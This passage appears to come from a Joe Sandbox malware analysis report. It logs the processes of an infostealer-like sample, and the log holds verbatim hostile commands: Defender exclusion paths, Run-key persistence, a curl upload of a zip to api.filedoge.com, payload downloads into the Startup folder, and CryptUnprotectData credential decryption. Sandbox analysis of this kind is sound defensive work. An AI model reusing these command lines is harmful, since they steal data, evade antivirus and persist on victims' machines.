                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:35
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:36
                                  Start time:02:33:31
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic baseboard get serialnumber
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:37
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:38
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic MemoryChip get /format:list
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\find.exe
                                  Wow64 process (32bit):false
                                  Commandline:find /i "Speed"
                                  Imagebase:0x7ff7ee050000
                                  File size:17'920 bytes
                                  MD5 hash:AE3F3DC3ED900F2A582BAD86A764508C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cscript.EXE //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs
                                  Imagebase:0x7ff766e20000
                                  File size:161'280 bytes
                                  MD5 hash:B8454647EFC71192BF7B1572D18F7BD8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:41
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7aad40000
                                  File size:875'008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:42
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
                                  Imagebase:0x7ff7aad40000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:43
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7aad40000
                                  File size:875'008 bytes
                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:44
                                  Start time:02:33:32
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:45
                                  Start time:02:33:33
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Microsoft\Windows"
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:46
                                  Start time:02:33:33
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:47
                                  Start time:02:33:33
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic path win32_computersystemproduct get uuid
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:48
                                  Start time:02:33:33
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:49
                                  Start time:02:33:33
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic path win32_VideoController get name
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:50
                                  Start time:02:33:34
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:51
                                  Start time:02:33:34
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic PATH Win32_VideoController GET Description,PNPDeviceID
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:52
                                  Start time:02:33:34
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1""
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:53
                                  Start time:02:33:34
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\CaptureScreens.ps1"
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:54
                                  Start time:02:33:34
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-887849.zip";"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:55
                                  Start time:02:33:34
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\curl.exe
                                  Wow64 process (32bit):false
                                  Commandline:curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-887849.zip";
                                  Imagebase:0x7ff6c9c40000
                                  File size:421'376 bytes
                                  MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:56
                                  Start time:02:33:35
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell Add-MpPreference -ExclusionPath "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows"
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:58
                                  Start time:02:33:35
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:59
                                  Start time:02:33:35
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:60
                                  Start time:02:33:35
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f
                                  Imagebase:0x7ff670c10000
                                  File size:77'312 bytes
                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:61
                                  Start time:02:33:35
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
                                  Imagebase:0x7ff670c10000
                                  File size:77'312 bytes
                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:62
                                  Start time:02:33:36
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\curl.exe
                                  Wow64 process (32bit):false
                                  Commandline:curl -o "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
                                  Imagebase:0x7ff6c9c40000
                                  File size:421'376 bytes
                                  MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:63
                                  Start time:02:33:36
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:64
                                  Start time:02:33:36
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\curl.exe
                                  Wow64 process (32bit):false
                                  Commandline:curl http://api.ipify.org/ --ssl-no-revoke
                                  Imagebase:0x7ff6c9c40000
                                  File size:421'376 bytes
                                  MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:65
                                  Start time:02:33:36
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:66
                                  Start time:02:33:36
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic memorychip get serialnumber
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:67
                                  Start time:02:33:37
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:68
                                  Start time:02:33:37
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic bios get smbiosbiosversion
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:69
                                  Start time:02:33:37
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\user\Desktop\golang-modules.exe" /f
                                  Imagebase:0x7ff670c10000
                                  File size:77'312 bytes
                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:70
                                  Start time:02:33:37
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\reg.exe
                                  Wow64 process (32bit):false
                                  Commandline:reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
                                  Imagebase:0x7ff670c10000
                                  File size:77'312 bytes
                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:71
                                  Start time:02:33:38
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\curl.exe
                                  Wow64 process (32bit):false
                                  Commandline:curl -o "C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
                                  Imagebase:0x7ff6c9c40000
                                  File size:421'376 bytes
                                  MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:72
                                  Start time:02:33:38
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:73
                                  Start time:02:33:38
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic csproduct get uuid
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:74
                                  Start time:02:33:38
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:75
                                  Start time:02:33:38
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic MemoryChip get /format:list
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:76
                                  Start time:02:33:38
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\find.exe
                                  Wow64 process (32bit):false
                                  Commandline:find /i "Speed"
                                  Imagebase:0x7ff7ee050000
                                  File size:17'920 bytes
                                  MD5 hash:AE3F3DC3ED900F2A582BAD86A764508C
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:77
                                  Start time:02:33:40
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:78
                                  Start time:02:33:40
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic cpu get processorid
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:79
                                  Start time:02:33:40
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:80
                                  Start time:02:33:40
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic path win32_VideoController get name
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:81
                                  Start time:02:33:41
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:82
                                  Start time:02:33:41
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\getmac.exe
                                  Wow64 process (32bit):false
                                  Commandline:getmac /NH
                                  Imagebase:0x7ff617b50000
                                  File size:90'112 bytes
                                  MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:83
                                  Start time:02:33:41
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:84
                                  Start time:02:33:41
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                                  Imagebase:0x7ff6c6f50000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:85
                                  Start time:02:33:42
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:86
                                  Start time:02:33:42
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\curl.exe
                                  Wow64 process (32bit):false
                                  Commandline:curl http://api.ipify.org/ --ssl-no-revoke
                                  Imagebase:0x7ff6c9c40000
                                  File size:421'376 bytes
                                  MD5 hash:1C3645EBDDBE2DA6A32A5F9FB43A3C23
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:87
                                  Start time:02:33:42
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:88
                                  Start time:02:33:42
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:wmic bios get smbiosbiosversion
                                  Imagebase:0x7ff6915f0000
                                  File size:526'848 bytes
                                  MD5 hash:A2EF3F0AD95FDA9262A5F9533B6DD1BD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:89
                                  Start time:02:33:43
                                  Start date:11/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
                                  Imagebase:0x7ff736600000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:4.4%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:100%
                                    Total number of Nodes:3
                                    Total number of Limit Nodes:0
                                    execution_graph 826 7ffe7c7750c9 827 7ffe7c775107 CryptUnprotectData 826->827 828 7ffe7c775183 827->828

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7ffe7c7750c9-7ffe7c775181 CryptUnprotectData 2 7ffe7c775183 0->2 3 7ffe7c775189-7ffe7c7751b8 0->3 2->3
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.109104155138.00007FFE7C770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C770000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_7ffe7c770000_powershell.jbxd
                                    Similarity
                                    • API ID: CryptDataUnprotect
                                    • String ID:
                                    • API String ID: 834300711-0
                                    • Opcode ID: 7b255996a838e8077a3877d7fd6eaedb6bcd6387e519c6ea120786e7af431ed0
                                    • Instruction ID: 775a27cf220dce17aa32a2b83a0da9117abee4d80d0b0ae8a4dcb2265228e149
                                    • Opcode Fuzzy Hash: 7b255996a838e8077a3877d7fd6eaedb6bcd6387e519c6ea120786e7af431ed0
                                    • Instruction Fuzzy Hash: 6731833191CA4C9FDB58EB5CD8066B9B7E0FB99321F00422EE449D3651DB74B8558BC2

                                    Execution Graph

                                    Execution Coverage:5.2%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:3
                                    Total number of Limit Nodes:0
                                    execution_graph 898 7ffe7c784aea 899 7ffe7c7850d0 CryptUnprotectData 898->899 901 7ffe7c785183 899->901

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.109157290614.00007FFE7C780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7C780000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_7ffe7c780000_powershell.jbxd
                                    Similarity
                                    • API ID: CryptDataUnprotect
                                    • String ID:
                                    • API String ID: 834300711-0
                                    • Opcode ID: bdb3e5f2b79ce3bd95c43e45833a96d8b91a6317c5e522bca7c149846a8e3cb9
                                    • Instruction ID: f1e25f1b0ffa4f9924647f015b11e3029cf991ab09fac6477b725cf482a7f0e4
